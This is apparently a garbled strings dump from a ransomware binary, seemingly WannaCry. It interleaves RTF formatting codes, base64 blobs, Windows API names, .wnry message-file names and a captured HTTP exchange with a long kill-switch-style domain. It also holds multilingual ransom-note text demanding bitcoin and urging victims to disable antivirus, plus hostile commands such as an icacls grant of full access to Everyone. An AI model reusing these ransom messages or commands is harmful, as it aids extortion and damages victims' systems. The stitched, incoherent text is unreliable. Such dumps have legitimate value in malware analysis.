\\af53\\afs22 \\ltrch\\fcs0 \\fs22\\loch\\af18\\hich\\af18\\dbch\\af18\\insrsid4986254\\charrsid8656048 c2\ c2\ \\af90\\afs22 \\ltrch\\fcs0 c2\ seltbaln\\alntblind\\lytcalctblwd\\lyttblrtgr\\lnbrkrule\\nobrkwrptbl\\snaptogridincell\\allowfieldendsel\\wrppunct\\asianbrkrule \\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\af0\\afs22\\alang1025 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1042\\loch\\f31506\\hich\\af31506\\dbch\\af31505\\cgrid\\langnp1033\\langfenp1042 \\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\af31507\\afs22\\alang1025 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1042\\loch\\f31506\\hich\\af31506\\dbch\\af31505\\cgrid\\langnp1033\\langfenp1042 
\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 }\\noqfpromote {\\stylesheet{\\ql \\li0\\ri0\\sa200\\sl276\\slmult1\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\af31507\\afs22\\alang1025 \\widowctrl\\ftnbj\\aenddoc\\trackmoves1\\trackformatting1\\donotembedsysfont1\\relyonvml0\\donotembedlingdata0\\grfdocevents0\\validatexml1\\showplaceholdtext0\\ignoremixedcontent0\\saveinvalidxml0\\showxmlerrors1\\noxlattoyen \\Windows\\ApiPort ]M(y /.8$ ]PC(r(t)t __cfduidd601df8d69eccd96df5a5e5fc812588201527694466iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/92167001653763074226925032040030668850* __cfduidda10305ee2446276c19f4d5c76c652efe1527694462iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/921666016537630742269314450644630668849* __CxxFrameHandler __getmainargs __p__commode _acmdln _local_unwind2 a ch}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid14315351\\charrsid3475210 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 A_A^A]A\\][^_ A_A^A]A\\^_][ AddressFamily ar a descriptografar seus arquivos imediatamente. 
attrib.exe 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 bbCUB+5x4jIXypy61OlDcDWgbfIXcwcI02u15qZXg4cV/VjsDiEQARjmMebJBucJxC7HA9GSmUefyzAun9fLULv3RbywhnNACbSX9hbRj/rxlAlfKv1cBRDwhcdL9p+vmwJmufSa7mqmel+wRdBNGUIkOwu9doVOSOQM2WSPYHEjf+flSY1IR0u0QtKoFBA5YCEQ/H1MieJp2eAyqorc8gfZy/Xm1Ggbp7hljJoD0Qp8KLv3I4vOg5UY2U3rHVAXV2U95LBAuz2bf5LJJjt8ZFv91IiqBm2TMu6vR8ISFbSJMgLtedMtOpDMjvXnuGKTvRdt9e9H7EyTpkUjh+PSFtgUy1l6w+ih2rkoXGWimyq6NfNTVzydKfUJNH/QNK2QymJBMi+B1iDjsnfqjK42mLmOb4JrY35bSTu/k0LV+pwDGuNGOTc/thQRhi41qd7+zxuar3PkrIeIrYvqt6DIeUgi2ZzuBOjgTBSL85B3d+TKSfiBL2O2MwV1znlr67d8p5ykZeWHcuPTljmhIa+6BSXZu6Aarj6a1W+JjGc8WTwsG04hyCUFCAoWIily6Ox5HIIWeQjRT7/sx2/RVT62tdngROALm96hvdjb6FaKloXyPBhZ9n6Y8dzYCzjuaShGsDt0+kz2fvBTK4xW9zbFOmMVAd2+exoO7PXmEjBGGwvZrKSlXsPucFWEJFub3z9XR9rS0gpX9YYbuxOvXgcEhj8A4G+i3nFgbuZMEfY6wHoxMuOs3ckYimc+KYaTtvcqfI77A+EXYZFOati4MLdrZEy17I4LAXlwRneOGcafrB6BC9u9WlXjKXzr3B7n3kP61SCs8jdDNHTP+nBbXETjMODrpsq1u/lpmviPBqfcGAaSjc9ypndhMPwjDhUDfj3ECNYFim//c1LLuC7UdWj3PJnsmTlCuIChbs4FAjRln/jXT+ByTXc1j3r9HytwqwvOM5NTfhEB0pYZ6KJ7y2bSn3uv8WmHWwedPGn0nvtGNkuiOFApptRDYHk9Pzb1cZf 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 bitcoins>. buffer error BypassHTTPNoCacheCheck %WINDIR%\\mssecsvc.exe CacheAllCompartments Ce sa \\'ee\\loch\\f31502 \\hich\\f31502 nt\\'e2\\loch\\f31502 mplat cu calculatorul meu? ChangeServiceConfig2A chercher un moyen de r\\'e9\\loch\\f31502 \\hich\\f31502 cup\\'e9\\loch\\f31502 \\hich\\f31502 rer vos fichiers, mais ne perdez pas votre temps. Personne ne peut r\\'e9\\loch\\f31502 \\hich\\f31502 cup\\'e9\\loch\\f31502 \\hich\\f31502 CloseServiceHandle cmd.exe /c ""%s"" Co si\\'ea\\loch\\f31528 \\hich\\f31528 zdarzy\\'b3\\loch\\f31528 o z moim komputerem? 
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 Com+Enabled com/office/word/2003/wordml}}\\paperw12240\\paperh15840\\margl1501\\margr1502\\margt1701\\margb1440\\gutter0\\ltrsect CombineFalseStartData CommercialDataOptIn CompanyName CompatDll ComputerName CorExitProcess CreateProcessA CreateServiceA CryptDestroyKey CryptGenKey CryptImportKey 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 data error DefaultConnectionSettings DefaultRegistrationRefreshInterval DefaultRegistrationTTL Description DisableLocalOverride DisableReverseAddressRegistrations diskpart.exe DisplayScriptDownloadFailureUI DOMAIN error Dv0J3kYCXlI1VWGOPCPeV/TlKYHi+JAtr5JqjzoZpBXYhrKUWEWIE8Pb5wTjdq/CPMBseTD/6Sw9N9MyBg9PTgoaZ5fDA+NzEJld/cyrDaJFmSpHFnnUKs2YB9afm3EtkG7Q4S0TykC6HxVwje5EdZsGG5AVfHJSGpc5THJCvXbst76Wnni8cTYZ3VHuLqSH3RBb1scfcvLKeM31MkqT1SW3pag/lpbVTAhI94Q/J/P2RcwJHyM7SJscu9BJB9vFldojKlxp5umYd1lwxgUaEoBVtk/5CFJzB6AfS/XhxmzEJTz0S7hn0P5W2XEQ7KjOyRQBl+QVbu8d+LnDBAdhC+pkvQYHQeB5hXW2/7byNxoZJ9blUl0J5QC2qs5 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 e szukasz sposobu na odzyskanie plik\\'f3\\loch\\f31528 \\hich\\f31528 w, ale nie marnuj czasu. 
Nikt nie mo\\'bf\\loch\\f31528 \\hich\\f31528 e odzyska\\'e6\\loch\\f31528 \\hich\\f31528 plik\\'f3\\loch\\f31528 \\hich\\f31528 w bez naszej us\\'b3\\loch\\f31528 eb0q12gFGo/ONN8r2hYqxKJt7YHupl1DMeZPAdJTG87XnFHT3JdBjdKLsugH1Xwx4BMx3z4FVd8YFTI9syt/MySjeDhxjdM3gFKUjUF2APza3Ee55Mqa7PxGkE9QYt7g2Ps784Y7hxgynQD4IttfsgKt9hkOFexzMmv9jKwMGJFdN4RsqHu/4+AGmpAWblMb78iMLZkhd3IUwJA7f4nERdjVE99CqXCqh4Xuvb8gD16B0qeCsToEGCsZX9ZsdoSqFOVJXR38VLz1Tiw3ERUQfyhKkFtkRfahKoxsdIreCEjsYjCX7xm+CCCS6yG7D0OLmRnP6U9CFR+5I1YU3fUjR9NCPTldOI5VCQ7OXbNTPeSPg/vVd43jGuprhyv egBG5w80ES4y87bU4/qqs68FzC3JDcJ49Fr+SxZvwt7cJSXlTB0q1URstIaOe42wEBR0cUYuI6W2FsD4uAhpqR1oNMa+xKwbIC3trPe4ltf49PmhtKoqKQSk639NB15gNGctx7J8XmosACNLfld6BPKtWF3TAGQSYAiZbGGN9+8ofnCUAMygm16XakHXZgjdRMIJ5xjECQ9XzlWIh0Ni9z4w/+5rrYnIV4a9M5ujAF7QSNkkSVMDovLJLkteuQfqAl8RCR5l1Sdqv5bx/G6yrp1c8z26GYqQBtRb1Zci/u558hwYZk2yOLjpXfKEmbhLS3Dny8ptdLtcMNsbedBL/5jim9yanyvE88Z0Dm0iF2WypQn7+v8wwRdT+zG5w7y9aj0iKoacnl5aAKlIhxUSvy9fD1HBxSSuDxFjA9hIAAfZL+B2zKjQGAGIlg07Be5MhSDEi6H/JXtuWENyoTmDtnmkGF4JhTYgn7mvGWe1BeQyYRielt9My7b7jzGFEqgpTqKttw50NnvWBn+HZqry5grNDDsXmKbehjFjhlZpJFHiq+KS0keqOiszaJU0rWBTDA+TEFuBrAfk+XGRtb7af+HA+06ummMgFGyqyKi/UWvRXiHdRs/U8Ww1jJoKtuq5Yu9uWSI/LkajpW+Kq8apnXWVwWTtV3Hlq2Cp4XRIR2vNwICrGSD5TceNhYsz2lUleDof9eVVJrNi20fJcQrdTzmJkmn2VywrMiEOL+ZvhGOUvQl8zl/nPjvLpexxNYEHaLfU7/dnU1o4VSI6JNet3EgSIQ9FFQDAsX/ToMRHLV156BfxLwoxtHIky7qukCgLLEih9Bp3mQHUmKrt4+3QvddEemEhUF3Zr+rFdEktHoO2hIR8ZA1XZqcWZRXECqYrAT/YDYUY4I5ykFN7ldzQ2dOndwALuLNwYal4h2Xl00Nxqc5so+5ooQDnQH507sxcyFIOaGxMnV+7/Cl/VbdmoZpxvlGQIKNzO5anscMBvLg7Z1Yr/AZ9TmVxAspk7Oa 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 EnableAdapterDomainNameRegistration EnableHttp1_1 EnableHttpTrace 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 error 
EU7+Zet9ut3cE1l633CJQ6ThcqDbSdqUvtF/vsDYIvAgMQM9affu9mUxukShVG7grH+e8zKSxJBvgoJ95Ba9YW4xYFcjvZuQy75wRZRVtsIDtiQ3+l+u6Cn17XJUdrFteE6ABsovKGHDURoj4X/MilC2C9EmMdytDzraOXOoWg8aEHVyeyXijdOD4yw+T21PfksAzAIAgnkgUHerKBxmnzDOHgkuUCSl0OtLfm1ak73Z0fawxxmB0xhJ+1hW0gov8d3Tteji4kr4WgvnQ4YuFqpGL8Ijim+wLO86XIHm8IXr5oNxENi72j/02xtypsVXGdIBaVNBGuk5i1z8jcYXgZmHLKI7oSWaUk6fMt4ibo42Cdez3s6Cz04dWBg ExitProcess E}[\\+(aT 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 ffice/word/2003/wordml}}\\paperw12240\\paperh15840\\margl1501\\margr1502\\margt1701\\margb1440\\gutter0\\ltrsect fice/word/2003/wordml}}\\paperw11906\\paperh16838\\margl867\\margr867\\margt1440\\margb1440\\gutter0\\ltrsect file error FileDescription FileVersion fLqCC7CAHqMKnYTcA3SUmuLGfxwL0aNQJPYYCUcJiryT3FPY5lVwFhOuqmJs0Dg/d3BB0r8dAlSEVK9SMWDIjS+PXA3om/XAGSLh8ZSVijmCOwA7X2k7RVng3yFSHLUkbWSEnPM/sgMC3D2nRt9wLJmA44P8hcsWfuNL7SRflVzXQHcV2adUtkLE+HIzjwt5cE7M2UVBSSxlPC1AAirfL6XEhauy6ScUpQDzWCFtL3afWvxZjM4U0K72Ju4lWHikgBcXLlaaNEC72ENdljVIzJVoPj9zZNyxiGSo70HmT7k830DHjzB6AYJj8/dhPMgfZj/yybHuUUpy1MIu+vBnJZRDenyS4kidxn1Iv+A/+dzn1210k+024JcFvuxBUimvE7dOLB3HgM0mZDnhy6VGaryy+ZPmM1V1EM1UhSdWljpJEF1fsB1jgDrN3F7QWmYOZm/5l0CCGbRQoywKE8AyQrlECIc08bZcGqdMOFuXjoMymMn82+4Z3TwCLBgGtD9nKWoWmRXJCtn0YD1D+Na0ItJQcgUkIeAOYYNRi6WszOl849/8vD/gRrvluxBQniGB+50GjJ5b/QArC6YsTn47vTHimG4361/8CSnGU1BD+F5VsOl9f9GFrdl8m22BcEX9CcrPPVu7bIoUMdA02NkkeL489kAHKh/Qy7/+t7nxpf0lEaEbRLVZnhq38OGpWihV/spVLJsJBWiNOW5VUEmEa/myHtIgTWq2BX0ZKuFE4haQIe7hFfWyn9gyrNyRo+/NnXf52VaD2cbnqjg+jtf0bTXzHG0fIyAR12HeyKW2od5ztKmad25Jzp07o7p2fbUzFRabo563brmIMoAVOmxm1c1FJ9pgIdPXQCtbjB4ASJW6lM79qAsCCAAWtwcMe6FmfG/KcMQMSYov0lsZAT2bnAOl8qM7tGYOHfifrQP7qGDm1l5/7kFu1PBzoGusLFSHAD5wx+6ll2fNEZXmzsY1Wp8TI9WgOOOmhgiTnlRLrvzCQsiwjEak/va8HC4KXSk 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 FlsGetValue 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 
FqHNJ2+W4KJRLvj0br7ivNYguNhHsBjWtserc9Qc1SQj1YpWS/fRZ0KP678/WofnBg1Rgx/MU82qdvR/1zd86C5rer3iy/cIXJZapr/ZOUTjiGV9bnPHlJV9pwyGJ57gfPafAmA1KOqK98BxGsol2G6eq6Hd/nUHqhcTA5srKTe9k0R9tcx7WllVEPMfPCDgor3O72RTfy/cvL/zdZGMhnrUH8Uor3RyAibM/fJcmQ5HAJyBF2vHMgXj1VC0VbNpSK78huGlUq2pv4irw+B1eCMgbeJeX/jBOXiNHeFXk2NO4cXRMhuItByT1izwa8F3DtuvF1gi2tcNTDPknnJoae5BRzAjUPZOZ1O3f21NQ8u7eUpLZIcn8igHSjR7mpM+as0mVglnTG+bSpz8K10WkrpPHBQzpNrSl5S9NZ3VYyyz3lPmypTdO8SjEVdw70XVgWWH83mHDl/d0fMgjp4vmHdhoU5RZgLhe9j1g1PLuFtRLZ6b376DjBL0rwkJ9Ts9j6Ua3KPevTEv0Cl8mLsDEnrdaDv88e3DtZD8kacR6MrP9ui/KOUQ+qNgEkjQcBXJO1sUMEVQQpMv5+VUUgtcsVR8f68KoCCTUb32ZnbNEpgAuLCEpt1Zo0RNyAUGB3G4FKcTAU06f0eIy96+5PesL4uLnQiF9LcCQ1INJ3gVaZCzuOKEHA5wldgJKpZDND7WXugJx9Gl/bXe5WIgj5GrglaWLqMAg3OEw+kUWsPbrQ3QXo5riW/JrICQtDfYRbY9XX57vzEIXkdycrSzLNJkhupUr3vhlZCnb0sRGS+saT+/zzGct4kH6LnGtNfQwSH9Lh0NFWiC7I5+yfdE2h3/qsotko5nP1rv5yy9JqHYC2YJtp9ZbcIry/ZwjjbC9TumiVXTmsalmbzFqC9fKO+nyhYKJ6Q6rRSuWbJ5F6enW2QQtTdatXWHUQSiKTEhV7bQjUjbj/tWKREEjDGYgKOxnGHaHKIGfag6dQOZVw04aURV6+HvSLFGcbL+M6qIQTIb FrameMerging FrameTabWindow FtpDefaultExpiryTimeSecs FyvD/+d8KjQ+vZREmGxZ+/yKtIKXOsz9+pMo0OiDcvtF3PlEUS6xy7ekKLyUOWAWFoR9s+H2bIXCRIo/Jdns9MdGkdz8+tco7bthLrJghq4A46rewPPAV1vte6FLbSLJonwdvJda4x4RldJLN4mRCT4nZ3t7O8oI/ePQxRdVXrtGJ0OQ5HlQrbdkvR6R7+hr8VdXdUcfdnHbb1BfzJiGI/e6+DyAxsdl29vVlXV0cVx6dNEAIkOVnLPajGppXEoiUc7sGlzOdU52RJCjgIVLG5Q/eKkNO9LTendYxljGopQHZ2SJXus2AQl97m0T6kswRtRBzqKS1cRYKce1MXGWmjsiMIrLz8NerBzf2NnrmQSBxUTIuUPqxoxBajr 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 
GCYPv9lQlkfTV1+aTMUTA0VfaLFyhZq68nTvu6n4pfUV30t9T3TFceGCIx4zTnCQ6S5EjjToosWCxmsltoACAot76+pWFnqcM81lhzddyobk6y7FHmjg68R4aFhZxnGaWE98CXh+wNXxpVQrRWuXsT/exO9Fgq3iJa9YrhsWDVrNddlLhlPZSjd+r7Vb1N42DLbI3TsRC6QTWTCW/u9CZP5OtTLfF5RtGJpRD1w7ATC3MGMEx3ecXVNTq93wT9UOpAdiYhTfRbbGSc3CQYjiZAQeP8+9l+vBMXIVPix9JjXoMpMMNALmtmyPcDktAfCRTNLvWW7/Yr/ZO80z7zqvqhJEEdffn8QkT9e5IWcMjcgV3Gglscqoh41iMXn7hUxI2bGaD2DPEQvGkIM1b/vVlcwQZ5hgqlHRLOCDWdMiIPJOyikWBpc0XExEycIbYGOOlrO1qmrdigNdT1yDJQK0Iv0NrdhqHw2+YH85NqAoCiWHU9cXoGYyaYsAy2tz1FEVsu6ci4R/YbYYSf6bOJo/jNWi/2Cpy6YkwJLe5+AMfbY2EaKnFOiMNs9lrNFzpwbfa7F+K9HYIis1Xtz0A4vXrvJashxkwrYVcchVKnccoXc5Q0mj2emCkx7YyU+DWEhpL705osvQUIkjXM4bmBD/8t5Fa2ByIChQeolaJJ3sDLApsbVoDd+8ZbRGl4964iBIMaHFxSapRYrdlwk29AS3LXPiJBFdQQZXwCOROaz7PZfs086Nt3A8Zq8FKpL6/ALGQDfNi2GdixRe8LNkFWt8ZIy8kzuf9uR6sUivF8FZKwniB9XioG9S0Oe0fHmIG8vPISlcD5hQlRVhnbHFybZAECaqzV97MMKdCi1oIys9aUz7r4H1AqrHiS/FXMyd/EP21A6cM3zGjxyktGoQx0hV3sYvthjyIwQAcUKpgmL+VETTLp8QV8kqV2rrzpqzHgbmgFThT13t6mHf9ELtg8wovtONtS0VBsTCaMSSpDwo5Jo7OayvdM0ZgmSJF3q+QK0a GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cachev GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cachey GetACP GetActiveWindow GetAdaptersInfo GetCommandLineA GetComputerNameW GetConsoleCP GetConsoleMode GetCPInfo GetCurrentDirectoryA GetCurrentProcess GetCurrentProcessId GetCurrentThread GetCurrentThreadId GetEnvironmentStringsW GetExitCodeProcess GetFileAttributesA GetFileAttributesW GetFileSize GetFileSizeEx GetFileType GetFullPathNameA GetLastActivePopup GetLastError GetModuleFileNameA GetModuleFileNameW GetModuleHandleA GetModuleHandleW GetNativeSystemInfo GetOEMCP GetPerAdapterInfo GetProcAddress GetProcessHeap GetProcessWindowStation GetStartupInfoA GetStartupInfoW GetStdHandle GetStringTypeW GetSystemTimeAsFileTime GetTempPathW GetTickCount GetUserObjectInformationW GetVersion GetWindowsDirectoryW Global\\MsWinZonesCacheCounterMutexA 
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 gtDZ1D3PsViACf6eCNazNXjyfs3PVKtrMZBuRJKW8wzFjbzQSIhdIDZOSjAXUgcdlP97sbMNkKnaMa6b5OoIkl+ntcznx2xWj6wCZGN8TNy49d+kC0aTEA4AqC8sAL5vg98Jkmv00XEKl2vICmUYMDTAmKpEiffmCaH19aOwHfwElTy1EnXAyAqSUxPax+VUeabSwSgo77Y/DOJUNTtvSA9akxw7ctUa6zNCo9NYkpYdmkl0kUVzEgdZQuLPb8He6gCiO/BIj5xXo92rx+uhczk25ArAZcQXDX1MRxY20HuT3rhmYYLpiuJX/mu7wb6CGWZ4i6/eolXB3sb3ucvGEzAheJm9zxnH3/tcqpC4MtJe/6OAawtD+e362d6 h(((( H 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 HeapSetInformation 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 How to buy bitcoins}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid11827162\\charrsid10775863 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 >. How to buy bitcoins}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid5593755\\charrsid11698073 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 >. How to buy}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 bitcoins>. 
HTTP/1.1 200 OKDate: Wed, 30 May 2018 15:34:22 GMTContent-Type: text/plainConnection: keep-aliveSet-Cookie: __cfduid=da10305ee2446276c19f4d5c76c652efe1527694462; expires=Thu, 30-May-19 15:34:22 GMT; path=/; domain=.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com; HttpOnlyContent-Length: 1Server: cloudflare-nginxCF-RAY: 423243b970d4a869-CDGv HTTP/1.1 200 OKDate: Wed, 30 May 2018 15:34:26 GMTContent-Type: text/plainConnection: keep-aliveSet-Cookie: __cfduid=d601df8d69eccd96df5a5e5fc812588201527694466; expires=Thu, 30-May-19 15:34:26 GMT; path=/; domain=.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com; HttpOnlyContent-Length: 1Server: cloudflare-nginxCF-RAY: 423243cd828db765-CDGy HttpDefaultExpiryTimeSecs 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 i recupera toate fi}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 i suma corect\\'e3\\loch\\f31528 \\hich\\f31528 la adresa specificat\\'e3\\loch\\f31528 \\hich\\f31528 \\'ee\\loch\\f31528 \\hich\\f31528 n aceast\\'e3\\loch\\f31528 \\hich\\f31528 fereastr\\'e3. i, iar plata va fi procesat\\'e3\\loch\\f31528 \\hich\\f31528 . \\'ce\\loch\\f31528 \\hich\\f31528 n cazul \\'ee\\loch\\f31528 \\hich\\f31528 n care antivirusul dvs. se actualizeaz\\'e3\\loch\\f31528 }{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 icacls . 
/grant Everyone:F /T /C /Q icacls.exe IMNyx1n62TU6oCC1ftHI4dy2cE4rIsPH7X9HCBGPYPsZAbsUCkkc1xBo8Z4Fsvp4FiQrqW1O/xCaPUg4mA8co3pxJxH14AliGB2uDI4D4uFm2kySLndaPbMGkbKX+IjjsqmUGSPvTO+8hpMOUODen4e8Kd9gZSMoNHSi2H2ti8wUlr07BC0Zu4eZ9VUrHG4qmqFAXRlqZF60Xj9y7zKK+33UP9pJTcbqy9BcvdgjEFmVcc323Gn9JWiPtAordxaRB1/EhmtL6ztjT2wK/cZn8/oymzo9kQ+o2+jeGC/lt7/NgtMhjskYnLIDr05P7PGhQWYA//03d9ZU79r7dJ+Cf3CWu8lW23D7W54BohM82affObtEDnwDlgg+MnE incompatible version incomplete distance tree incomplete dynamic bit lengths tree incomplete literal/length tree inflate 1.1.3 Copyright 1995-1998 Mark Adler InfoTip insufficient memory iu p\\'b3\\loch\\f31528 \\hich\\f31528 atno\\'9c\\loch\\f31528 ci kliknij <}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid10775863 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 Check Payment}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ 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 j2we/eOEgsdJaALstzzVll0rPXIF501SIOmrcFEJh8lIEf8pW1daYqgEMXZ/1BpUzwMWD5jXvWQa+axhtIilVnEC1OwTGy3wi/r9LcDedgTXOnANzcYcUctIQTk1i2YSbSbAXQGfcsOz8WuTaRM6izqBTyXIK9tN11KVs795Y4BbKeIypCrVHOUY6Y2OtaHS9GhqoGojWs39jjKb9sPkWulrHwPEUl9A42NyUza+S6awW/ySODRkWkTKYS2zyEAso0k4KR4hl2KvJFDnwX157Hp1rsfwS2BCFjByigWVbdT5GMi0HaSukFUskn3ghnVP1G9fWhI7XzVi4XXu+uzDfYNainzFux7CUA33IhPTet1KPoVrQZYwzyjpv52sBPWG4RSCKDYRR+QUo0Pte8/0ix4PGf/VFzxDB+C3pHP2HGNsNX9zT9FJZLgOld40WLdof0IsgNeTLUVyy+o0FL/xp1+J0UQgpb71qWilo8RDEZqcFle9+FdGTlnR4ZcbgG7j1Td/YltwmCAZsTFbCQwmDls8KmZlvzaz4qOOLTuVAyX2e6HKfuPQmzs8X6rGnDTqtFvEELPjWtEQsxs8d1krRZO3FYFUUTeWphjMefQjj745faY6AHmnLK8sir5aG7B6v6OsqHGZ/UXDTPDCCbIBdz2ohdHbKAMH0rka/vVZXeQ8AdSwIOK8j792KDUQFq2BoEEHoOLmwCCg4D0Sbuyh+CcSDYyRiwsczJQE4XaI5LAsPBqpZhKnk6hvi+BYFJQPY3EErRBlIh1MFL7KnW3hroMlMUOaICr+hANsZvjgdN2HTldlqqwzUppld56Mjpy0lLCHljvKmjZyJhfgIwzlgk+wd4qQQGh1XAAV9d0Q5nTA9nWn8x5epjMix1c2jLx+Vdsz3DmzJ5hH32kHEdrxs3iIypHAdC4LXlzG8oKa1+XeHsGFyHSD1qFewdGpRdw4ilEHJHTT9XAKTFOzlP3iM8c9VJXAo96k4GU1EYMobVLqnC9zLwG2+eKzZsgPNE1 
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 je\\'9c\\loch\\f31528 \\hich\\f31528 li nie zap\\'b3\\loch\\f31528 \\hich\\f31528 acisz za 7 dni, nie b\\'ea\\loch\\f31528 \\hich\\f31528 dziesz w stanie odzyska\\'e6\\loch\\f31528 \\hich\\f31528 plik\\'f3\\loch\\f31528 w na zawsze. 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 kh\\'f4\\loch\\f31502 ng th}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 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 khOLxOQAn/IjmRDkjhs/Xpl9MhQcHeSAglIJqwBveNlyENOeS17tlNfltwF4MW3IwdDTWsH5KS7f5XpnONRbeHLx/77378LF6uXQdEItDpTZBtNg4WrSJAIH0f7qMHsw1P0PJOkQyZucyRCUc3lHbPVKEVzNCm04BCLgB5RLkRiDgW6d8NlbgtZXTftsO/u9mQrOLa25hQojiLgKIHhZHLAX7IIalCPyceNy4rdTTZwdnZ3h9mpK654kwAHq6sjB2UaTDzUu5TtdAcaBrOx2DEU9DLiLGnstSOQmRbnIpoTjDso5bpV9g2IkugYK7XV+4WPz3pXbxTZxaWl12giSxWWYR9g4284CAeRzsSeWQFVFJm6JdFRCyhS8b/C+zvbrodE+JdYeihaDGFAa/w8AG3kgZJKXHJyHs/iaVyYoha44EoSipxs/nsxFhovszFFoyg8sylsJSb1ieWSZ+zsOD9tE53eQgz6PAXEFvBBwtMFXaDdIVelkF6xle/MAoMNVqWK3W+n8L9NZ7wYmVP4vCuSh9mLKA25zC1YmdsN0iBjsJhSRJolrn980RjBKkd8eLCxLEBxKqQrcw1sLWdG0QwiO8bXDFCegGGOTZ51FjRTxvh/eBNAqPOntSsMr48UJcfuKJxgnTHv+upbIC2GeAlVeV4Qp6J9UxDU8m7YxTAiemh9ohiXg4UHnqvM3jkJWvdjReYM9IvGV1YhICk7QC7UfkeraYS/moBqAqv+2rSkM3b55wlkMgAvxBXm4bmouBREiOoaamAxexJbVF5ngzVMoNgon560U/XW8LSQFAQKnIAJRLIwifImFnapi7DUEPN6DRZ3voo6yJPrtdqBXdXfcO1ButKElQuca3zkfxx25Kr1fGx/GvI+Zeo/3jWxe8brtu0XfwXJgi9a4zcKYlpIu+SJs8IAGbe06EV3i6AlH+n2nGCjsflmhFuOHXP4b8pj9Kfnkhpp1oHvZcPqb5fUbxE96QCBFroYjhLO6f8QdQT4xB+SRFMEbAk2aHMS4 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 lhdfrgui.exe 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 loating point support not loaded Local AppData LocalAlloc LocalFileTimeToFileTime LocalFree LocalizedName LocalRedirectOnly lp, skicka ett meddelande genom att klicka p\\'e5\\loch\\f31502 <}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 
\\f31502\\fs22\\insrsid13779469 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 Contact Us}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid15532574\\charrsid13779469 m ditt antivirusprogram uppdateras och tar bort denna programvara automatiskt kommer det inte att kunna \\'e5\\loch\\f31502 \\hich\\f31502 terst\\'e4\\loch\\f31502 \\hich\\f31502 lla dina filer \\'e4\\loch\\f31502 ven om du betalar! Marami sa iyong mga dokumento, mga larawan, video, database at iba pang mga file ay hindi na maa-access dahil ang mga ito ay nai-naka-encrypt. Siguro ikaw ay abala naghahanap para sa isang paraan upang mabawi ang iyong mga file, ngunit huwag mag-aksaya ng Masidhi naming inirerekumenda mong hindi nag-aalis ng software na ito, at huwag paganahin ang iyong mga anti-virus para sa isang habang, hanggang mong bayaran at ang pagbabayad ay makakakuha ng maproseso. Kung ang iyong anti-virus ay maka MaxConnectionsPer1_0Server MaxConnectionsPerProxy MaxConnectionsPerServer MaxHttpRedirects MaxNumberOfAddressesToRegister MBCSAPIforCrack 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 Microsoft Security Center (2.0) Service Microsoft Visual C++ Runtime Library MinSockaddrLength mscoree.dll msg/m_chinese (simplified).wnry msg/m_chinese (simplified).wnryR9 msg/m_chinese (traditional).wnry msg/m_portuguese.wnry mssecsvc.exe 